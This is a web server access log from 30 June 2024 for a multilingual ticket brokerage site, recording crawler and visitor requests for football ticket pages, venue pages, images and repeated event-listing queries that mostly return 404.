158.220.119.234 - - [30/Jun/2024:02:44:36 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=49131D36-554D-2A5D-24DA-472029203F75&sortorder=desc&column=section HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:44:36 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1F8B6B82-6B73-637B-114E-E0458D73CE47 HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:44:40 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/lazio/ HTTP/1.1" 200 74672
192.99.3.137 - - [30/Jun/2024:02:44:42 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1FD00E9B-3A03-E379-9B08-FF7D16F1A6A6&sortorder=desc&column=price HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:44:43 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=492C1137-7E95-5EDF-8C64-E404B3827DAB&sortorder=desc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:44:44 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/inter/ HTTP/1.1" 200 74575
158.220.124.16 - - [30/Jun/2024:02:44:45 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C39F342B-47CC-48AF-2B44-DB99C6E88157&sortorder=asc&column=section HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:44:46 +0200] "GET /ticket2/opencms/img/icons/no.png HTTP/1.1" 200 1958
66.249.92.131 - - [30/Jun/2024:02:44:46 +0200] "GET /ticket2/opencms/img/icons/se.png HTTP/1.1" 200 1258
192.99.3.137 - - [30/Jun/2024:02:44:47 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=1FD00E9B-3A03-E379-9B08-FF7D16F1A6A6&sortorder=desc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:44:48 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/milan/ HTTP/1.1" 200 75560
66.249.92.132 - - [30/Jun/2024:02:44:48 +0200] "GET /ticket2/opencms/img/icons/dk.png HTTP/1.1" 200 1706
66.249.92.131 - - [30/Jun/2024:02:44:48 +0200] "GET /ticket2/opencms/img/icons/fi.png HTTP/1.1" 200 1785
66.249.92.131 - - [30/Jun/2024:02:44:49 +0200] "GET /ticket2/opencms/img/icons/nl.png HTTP/1.1" 200 1255
158.220.119.234 - - [30/Jun/2024:02:44:51 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=49C08FA0-ED06-3265-70AE-3BEE76F3DD9E HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:44:51 +0200] "GET /ticket2/opencms/img/icons/globe-white.png HTTP/1.1" 200 947
3.224.220.101 - - [30/Jun/2024:02:44:52 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/cadiz/ HTTP/1.1" 200 73308
66.249.92.131 - - [30/Jun/2024:02:44:52 +0200] "GET /ticket2/opencms/img/icons/de.png HTTP/1.1" 200 1124
192.99.3.137 - - [30/Jun/2024:02:44:53 +0200] "GET /ticket2/opencms/dk/nl/buy/?page=1&edid=3DD93626-388E-B658-D6F1-23C401A796FB HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:44:54 +0200] "GET /ticket2/opencms/img/icons/fr.png HTTP/1.1" 200 1764
40.77.167.23 - - [30/Jun/2024:02:44:54 +0200] "GET /ticket2/opencms/sv/sport/fotbollsbiljetter/premier_league/west_ham_united/ HTTP/1.1" 200 83928
66.249.92.131 - - [30/Jun/2024:02:44:54 +0200] "GET /ticket2/opencms/img/icons/es.png HTTP/1.1" 200 1005
23.22.35.162 - - [30/Jun/2024:02:44:56 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/monza/ HTTP/1.1" 200 73142
66.249.92.131 - - [30/Jun/2024:02:44:56 +0200] "GET /ticket2/opencms/img/icons/it.png HTTP/1.1" 200 2040
192.99.3.137 - - [30/Jun/2024:02:44:56 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=1DFA0E22-C962-FF1B-3BAF-2883C20EA7B5&sortorder=asc&column=price HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:44:57 +0200] "GET /ticket2/opencms/img/icons/en.png HTTP/1.1" 200 2415
66.249.92.131 - - [30/Jun/2024:02:44:57 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/logo-new.png HTTP/1.1" 200 13541
158.220.119.234 - - [30/Jun/2024:02:44:57 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4A1D70D3-E87D-9CAD-A3CA-0F1A9CD4D29D HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:44:58 +0200] "GET /ticket2/opencms/img/insta.png HTTP/1.1" 200 3967
66.249.92.131 - - [30/Jun/2024:02:44:58 +0200] "GET /ticket2/opencms/img/fb.png HTTP/1.1" 200 1269
66.249.92.131 - - [30/Jun/2024:02:44:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/sv/premier_league_sv.png HTTP/1.1" 200 13518
158.220.124.16 - - [30/Jun/2024:02:44:59 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C39F342B-47CC-48AF-2B44-DB99C6E88157&sortorder=desc&column=price HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:44:59 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_1_nordea.png HTTP/1.1" 200 4807
23.22.35.162 - - [30/Jun/2024:02:45:00 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/lecce/ HTTP/1.1" 200 73148
192.99.3.137 - - [30/Jun/2024:02:45:00 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=1FD934D8-9A8F-2315-FD16-0884AFD61884&sortorder=desc&column=price HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:45:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_2_handelsbanken.png HTTP/1.1" 200 4509
66.249.92.131 - - [30/Jun/2024:02:45:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_3_swedbank.png HTTP/1.1" 200 5740
66.249.92.131 - - [30/Jun/2024:02:45:01 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_4_seb.png HTTP/1.1" 200 2487
66.249.92.131 - - [30/Jun/2024:02:45:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_5_visa_mastercard.png HTTP/1.1" 200 8196
66.249.92.131 - - [30/Jun/2024:02:45:02 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/bank_6_american_express.png HTTP/1.1" 200 5570
66.249.92.131 - - [30/Jun/2024:02:45:03 +0200] "GET /ticket2/opencms/img/arrow.png HTTP/1.1" 200 753
66.249.92.131 - - [30/Jun/2024:02:45:03 +0200] "GET /ticket2/opencms/img/mail.png HTTP/1.1" 200 403
192.99.3.137 - - [30/Jun/2024:02:45:03 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=2C92A3B0-FEC1-5ECE-B821-5CAD902DA0E1&sortorder=desc&column=price HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:45:04 +0200] "GET /ticket2/opencms/img/check.png HTTP/1.1" 200 548
52.70.240.171 - - [30/Jun/2024:02:45:04 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/genoa/ HTTP/1.1" 200 73197
158.220.119.234 - - [30/Jun/2024:02:45:04 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4B7056C7-B18C-ECB8-1E3F-F15C483408B8&sortorder=desc&column=price HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:45:04 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416
66.249.92.131 - - [30/Jun/2024:02:45:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:45:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/sv/premier_league_sv.png HTTP/1.1" 200 13518
66.249.92.131 - - [30/Jun/2024:02:45:06 +0200] "GET /ticket2/opencms/img/chat.png HTTP/1.1" 200 416
192.99.3.137 - - [30/Jun/2024:02:45:07 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=31CFF865-AEBB-B4D0-C11D-57C54407DE09&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:45:07 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/lazio/ HTTP/1.1" 200 73934
40.77.167.4 - - [30/Jun/2024:02:45:09 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=8DAC444C-448D-A1B9-AA6B-69B974B642D4 HTTP/1.1" 200 86734
40.77.167.4 - - [30/Jun/2024:02:45:09 +0200] "GET /ticket2/opencms/fi/venue/?venueid=364B4CF5-A40E-22B8-2221-EA8BDED4766A HTTP/1.1" 200 72912
158.220.119.234 - - [30/Jun/2024:02:45:10 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4BABAE1E-0D71-179E-0279-AD6DDD722EFF&sortorder=desc&column=price HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:45:10 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=6BF862F8-A441-DB7D-094A-EE5943FAD633&sortorder=asc&column=row HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:45:11 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=C45D31CB-E6BD-151C-FD78-14565DAD8ACA&sortorder=asc&column=price HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:45:12 +0200] "GET /ticket2/opencms/en/sport/football-tickets/serie_a/inter/ HTTP/1.1" 200 73201
51.222.253.7 - - [30/Jun/2024:02:45:12 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/la_liga/celta_vigo/ HTTP/1.1" 200 72717
192.99.3.137 - - [30/Jun/2024:02:45:14 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=6C5F3F1C-BF53-7DEF-0613-7A6CBD308726&sortorder=asc&column=price HTTP/1.1" 404 -
66.249.92.131 - - [30/Jun/2024:02:45:14 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/css/images/ui-bg_flat_75_ffffff_40x100.png HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:45:15 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/serie_a/roma/ HTTP/1.1" 200 74133
158.220.119.234 - - [30/Jun/2024:02:45:16 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4BCBE7F2-6908-F260-D7C8-D92DE467FC09&sortorder=asc&column=price HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:45:17 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=6C5F3F1C-BF53-7DEF-0613-7A6CBD308726&sortorder=asc&column=row HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:45:19 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D0713995-7A61-911E-7E61-253175699AC7&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:45:20 +0200] "GET /ticket2/opencms/en/search.html?searchQuery=chelsea&submit= HTTP/1.1" 200 114427
192.99.3.137 - - [30/Jun/2024:02:45:21 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=6C66269F-1C8A-026B-D7A5-A693D7B74066&sortorder=asc&column=row HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:45:23 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4BFD92F6-57EF-BCA9-E83A-B1CC41C03BFB&sortorder=desc&column=row HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:45:24 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=6D659B0C-D907-0405-67DC-00DF3824F864&sortorder=asc&column=section HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:45:28 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D0713995-7A61-911E-7E61-253175699AC7&sortorder=desc&column=section HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:45:28 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=6E26101E-BD16-558E-CCE3-40BB9417A742&sortorder=desc&column=row HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:45:30 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4C0E2D60-F642-3EA7-4AF8-4A6B372A6F1A&sortorder=asc&column=price HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:45:32 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=6EE67C79-47B0-3BFF-FB3B-A7C2DD158FA7&sortorder=asc&column=section HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:45:32 +0200] "GET /ticket2/opencms/en/search.html?searchQuery=tottenham&submit= HTTP/1.1" 200 113398
158.220.124.16 - - [30/Jun/2024:02:45:35 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D107AF81-2625-16F6-4945-BFED75601468&sortorder=desc&column=price HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:45:36 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4C0E2D60-F642-3EA7-4AF8-4A6B372A6F1A&sortorder=asc&column=row HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:45:37 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E4F651AE-B2D8-F822-EEFA-BB149F022D35&sortorder=asc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:45:40 +0200] "GET /ticket2/opencms/en/search.html?searchQuery=barcelona&submit= HTTP/1.1" 200 92756
158.220.119.234 - - [30/Jun/2024:02:45:41 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4C0E2D60-F642-3EA7-4AF8-4A6B372A6F1A&sortorder=asc&column=section HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:45:43 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E4F651AE-B2D8-F822-EEFA-BB149F022D35&sortorder=asc&column=section HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:45:44 +0200] "GET /ticket2/opencms/en/search.html?searchQuery=liverpool&submit= HTTP/1.1" 200 111971
158.220.119.234 - - [30/Jun/2024:02:45:47 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4CCCE17A-D346-BB0B-92E1-11763BCC5ACD&sortorder=asc&column=row HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:45:49 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E533D595-3E8C-1E1B-0865-8CC262EB530B&sortorder=asc&column=price HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:45:49 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D107AF81-2625-16F6-4945-BFED75601468&sortorder=desc&column=row HTTP/1.1" 404 -
216.245.221.83 - - [30/Jun/2024:02:45:53 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
158.220.119.234 - - [30/Jun/2024:02:45:54 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4CCCE17A-D346-BB0B-92E1-11763BCC5ACD&sortorder=desc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:45:54 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 91208
192.99.3.137 - - [30/Jun/2024:02:45:54 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E533D595-3E8C-1E1B-0865-8CC262EB530B&sortorder=desc&column=price HTTP/1.1" 404 -
216.245.221.83 - - [30/Jun/2024:02:45:56 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
23.22.35.162 - - [30/Jun/2024:02:45:58 +0200] "GET /ticket2/opencms/no/ HTTP/1.1" 200 92442
192.99.3.137 - - [30/Jun/2024:02:46:00 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E60046C5-01D5-A277-69B4-5749B27E17F5&sortorder=asc&column=price HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:46:00 +0200] "GET /ticket2/opencms/no/buy_safety/ HTTP/1.1" 200 74128
158.220.119.234 - - [30/Jun/2024:02:46:00 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4D75BF52-3CC3-05C2-13C4-29D0C667645C&sortorder=asc&column=price HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:46:03 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D107AF81-2625-16F6-4945-BFED75601468&sortorder=desc&column=section HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:46:04 +0200] "GET /ticket2/opencms/en/buy_safety/ HTTP/1.1" 200 71954
192.99.3.137 - - [30/Jun/2024:02:46:05 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E60046C5-01D5-A277-69B4-5749B27E17F5&sortorder=asc&column=row HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:46:07 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=4D75BF52-3CC3-05C2-13C4-29D0C667645C&sortorder=asc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:46:08 +0200] "GET /ticket2/opencms/en/about/press HTTP/1.1" 200 71926
192.99.3.137 - - [30/Jun/2024:02:46:11 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E652EC10-E4EA-0C76-34D0-7A9A143A55AF&sortorder=asc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:46:12 +0200] "GET /ticket2/opencms/no/about/press HTTP/1.1" 200 73909
158.220.124.16 - - [30/Jun/2024:02:46:15 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D16DA74F-82BD-078A-CF3E-3033D52E5AD2&sortorder=asc&column=price HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:46:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/content/about_t2_no.png HTTP/1.1" 200 17428
192.99.3.137 - - [30/Jun/2024:02:46:16 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E67DD6CD-AF7F-D6DE-87EF-529B2AEFCE16&sortorder=asc&column=section HTTP/1.1" 404 -
51.222.253.16 - - [30/Jun/2024:02:46:17 +0200] "GET /ticket2/opencms/en/venue/?venueid=BC292235-0368-F4B6-A5B1-8737AD416345 HTTP/1.1" 200 71318
52.70.240.171 - - [30/Jun/2024:02:46:20 +0200] "GET /ticket2/opencms/sv/partners/ HTTP/1.1" 200 -
40.77.167.50 - - [30/Jun/2024:02:46:21 +0200] "GET /ticket2/opencms/en/buy/?page=1&edid=DA671318-BDE3-73A9-E958-2831AE41AF69 HTTP/1.1" 200 88059
192.99.3.137 - - [30/Jun/2024:02:46:22 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E688318C-8BD2-52B1-8214-3B9499EE0B50&sortorder=asc&column=price HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:46:24 +0200] "GET /ticket2/opencms/no/about/press/ HTTP/1.1" 200 73909
192.99.3.137 - - [30/Jun/2024:02:46:27 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=E9E2EF64-D379-DD67-D513-D0AD1E29ED2D&sortorder=asc&column=section HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:46:27 +0200] "GET /ticket2/opencms/no/sport/motor/ HTTP/1.1" 200 71452
158.220.124.16 - - [30/Jun/2024:02:46:28 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D21A287B-B22E-7CED-945F-4E21093950FF&sortorder=desc&column=row HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:46:32 +0200] "GET /ticket2/opencms/ticket2/ticket2/ticket2/ticket2/sites/ticketbrokerage/en/login/ HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:46:33 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EADB5142-E316-D488-65C9-672C3841B36D&sortorder=asc&column=price HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:46:36 +0200] "GET /ticket2/opencms/en/about/ HTTP/1.1" 200 70933
192.99.3.137 - - [30/Jun/2024:02:46:38 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EADB5142-E316-D488-65C9-672C3841B36D&sortorder=asc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:46:42 +0200] "GET /ticket2/opencms/no/about/ HTTP/1.1" 200 73695
158.220.124.16 - - [30/Jun/2024:02:46:43 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D21A287B-B22E-7CED-945F-4E21093950FF&sortorder=desc&column=section HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:46:44 +0200] "GET /ticket2/opencms/en/sport/ HTTP/1.1" 200 70383
192.99.3.137 - - [30/Jun/2024:02:46:44 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EB9627C9-52D2-61B9-CC5F-44B4B3CC8D99&sortorder=asc&column=section HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:46:48 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/en/sports_en.png HTTP/1.1" 200 75699
192.99.3.137 - - [30/Jun/2024:02:46:49 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EBA49F8A-33E9-0C95-472B-EF6292B7073A&sortorder=desc&column=section HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:46:53 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D2AD8C81-9CCD-E92E-3E94-61010E88DF73 HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:46:55 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EBDE16C3-D52D-1A2B-5ECC-1FCB64F51698 HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:46:56 +0200] "GET /ticket2/opencms/no/login/ HTTP/1.1" 200 74756
52.70.240.171 - - [30/Jun/2024:02:46:56 +0200] "GET /ticket2/opencms/no/sport/ HTTP/1.1" 200 71643
23.22.35.162 - - [30/Jun/2024:02:47:00 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/pics/banners/no/sports_no.png HTTP/1.1" 200 74949
192.99.3.137 - - [30/Jun/2024:02:47:00 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EC1CEE7F-0D0E-364E-1B36-05B890BB56A8&sortorder=desc&column=row HTTP/1.1" 404 -
185.191.171.2 - - [30/Jun/2024:02:47:03 +0200] "GET /ticket2/opencms/nl/sport/voetbal-tickets/premier_league/nottingham/ HTTP/1.1" 200 83892
3.224.220.101 - - [30/Jun/2024:02:47:04 +0200] "GET /ticket2/opencms/en/login/ HTTP/1.1" 200 73431
158.220.124.16 - - [30/Jun/2024:02:47:05 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D365270F-785D-2C1A-552E-4C45198D1C5B HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:47:06 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EC1CEE7F-0D0E-364E-1B36-05B890BB56A8&sortorder=desc&column=section HTTP/1.1" 404 -
52.167.144.67 - - [30/Jun/2024:02:47:07 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
52.167.144.67 - - [30/Jun/2024:02:47:08 +0200] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
3.224.220.101 - - [30/Jun/2024:02:47:08 +0200] "GET /ticket2/opencms/ticket2/ticket2/ticket2/ticket2/sites/ticketbrokerage/en/standard/ HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:47:11 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EC2EBB26-08CC-27AC-749B-D6061A772A42 HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:47:12 +0200] "GET /ticket2/opencms/en/venue/?venueid=924F6A71-B6FB-26C5-04CA-1B49F86B9FF1 HTTP/1.1" 200 71377
216.245.221.83 - - [30/Jun/2024:02:47:13 +0200] "HEAD /ticket2/opencms/ HTTP/1.1" 302 -
216.245.221.83 - - [30/Jun/2024:02:47:14 +0200] "HEAD /ticket2/opencms/en/ HTTP/1.1" 200 -
52.70.240.171 - - [30/Jun/2024:02:47:16 +0200] "GET /ticket2/opencms/en/venue/ HTTP/1.1" 200 342661
192.99.3.137 - - [30/Jun/2024:02:47:16 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EC2EBB26-08CC-27AC-749B-D6061A772A42&sortorder=asc&column=price HTTP/1.1" 404 -
51.222.253.16 - - [30/Jun/2024:02:47:18 +0200] "GET /ticket2/opencms/en/venue/?venueid=F948084C-F7DA-FF17-09AE-6FAF87CBA934 HTTP/1.1" 200 71365
3.224.220.101 - - [30/Jun/2024:02:47:20 +0200] "GET /ticket2/opencms/en/venue/?venueid=37FDBD7B-74BE-8950-65E3-B6CF46D7D303 HTTP/1.1" 200 73778
192.99.3.137 - - [30/Jun/2024:02:47:22 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EC2EBB26-08CC-27AC-749B-D6061A772A42&sortorder=asc&column=row HTTP/1.1" 404 -
158.220.124.16 - - [30/Jun/2024:02:47:22 +0200] "GET /ticket2/opencms/se/nl/buy/?page=1&edid=D38A75EF-0F2E-99D7-BE2D-1257A3573610 HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:47:24 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=AA66C67A-2B69-E1E0-8AB1-425B8E34A4A9&sortorder=desc&column=row HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:47:27 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EC2EBB26-08CC-27AC-749B-D6061A772A42&sortorder=asc&column=section HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:47:28 +0200] "GET /ticket2/opencms/en/sell/?edid=1AD4E11C-C792-1721-4D1A-2229101A30FD HTTP/1.1" 302 -
158.220.119.234 - - [30/Jun/2024:02:47:30 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=AA66C67A-2B69-E1E0-8AB1-425B8E34A4A9&sortorder=desc&column=section HTTP/1.1" 404 -
52.70.240.171 - - [30/Jun/2024:02:47:32 +0200] "GET /ticket2/opencms/en/sell/?edid=5E608C7A-903B-E4BB-4868-5D83917347B8 HTTP/1.1" 302 -
192.99.3.137 - - [30/Jun/2024:02:47:33 +0200] "GET /ticket2/opencms/dk/no/buy/?page=1&edid=EC74E210-A5EE-51AE-1B8A-E040E50F22D8 HTTP/1.1" 404 -
66.249.66.199 - - [30/Jun/2024:02:47:35 +0200] "GET /ticket2/opencms/no/sport/fotballsbilletter/premier_league/arsenal/ HTTP/1.1" 200 85155
66.249.76.168 - - [30/Jun/2024:02:47:36 +0200] "GET /ticket2/opencms/sv/sport/hockeybiljetter/nhl/ny-rangers/ HTTP/1.1" 200 76332
3.224.220.101 - - [30/Jun/2024:02:47:36 +0200] "GET /ticket2/opencms/en/sell/?edid=BE8C7FA0-9E48-EAB3-3A70-9E9F9EA30F95 HTTP/1.1" 302 -
158.220.119.234 - - [30/Jun/2024:02:47:37 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=AA846239-9C01-F79F-429F-223A194A604D&sortorder=asc&column=price HTTP/1.1" 404 -
192.99.3.137 - - [30/Jun/2024:02:47:37 +0200] "GET /ticket2/opencms/dk/ru/buy/?page=1&edid=17687D32-5E2D-8573-6D52-BE9A2F51FA8D&sortorder=desc&column=row HTTP/1.1" 404 -
3.224.220.101 - - [30/Jun/2024:02:47:40 +0200] "GET /ticket2/opencms/en/sell/?edid=2197E523-8740-2A01-BD5D-12E3C3F2DBFE HTTP/1.1" 302 -
207.46.13.155 - - [30/Jun/2024:02:47:41 +0200] "GET /ticket2/opencms/en/buy?page=1&edid=2C628F37-50C8-6D86-55F0-9E385D7A6FB4 HTTP/1.1" 200 85181
192.99.3.137 - - [30/Jun/2024:02:47:42 +0200] "GET /ticket2/opencms/dk/ru/buy/?page=1&edid=5FF30AB9-4C2B-5D59-31F0-3F0E1E70CA95 HTTP/1.1" 404 -
158.220.119.234 - - [30/Jun/2024:02:47:43 +0200] "GET /ticket2/opencms/se/ru/buy/?page=1&edid=AA846239-9C01-F79F-429F-223A194A604D&sortorder=asc&column=section HTTP/1.1" 404 -
23.22.35.162 - - [30/Jun/2024:02:47:44 +0200] "GET /ticket2/opencms/en/sell/?edid=5C8841EF-C65C-22D8-40C3-FC05B2FF785E HTTP/1.1" 302 -
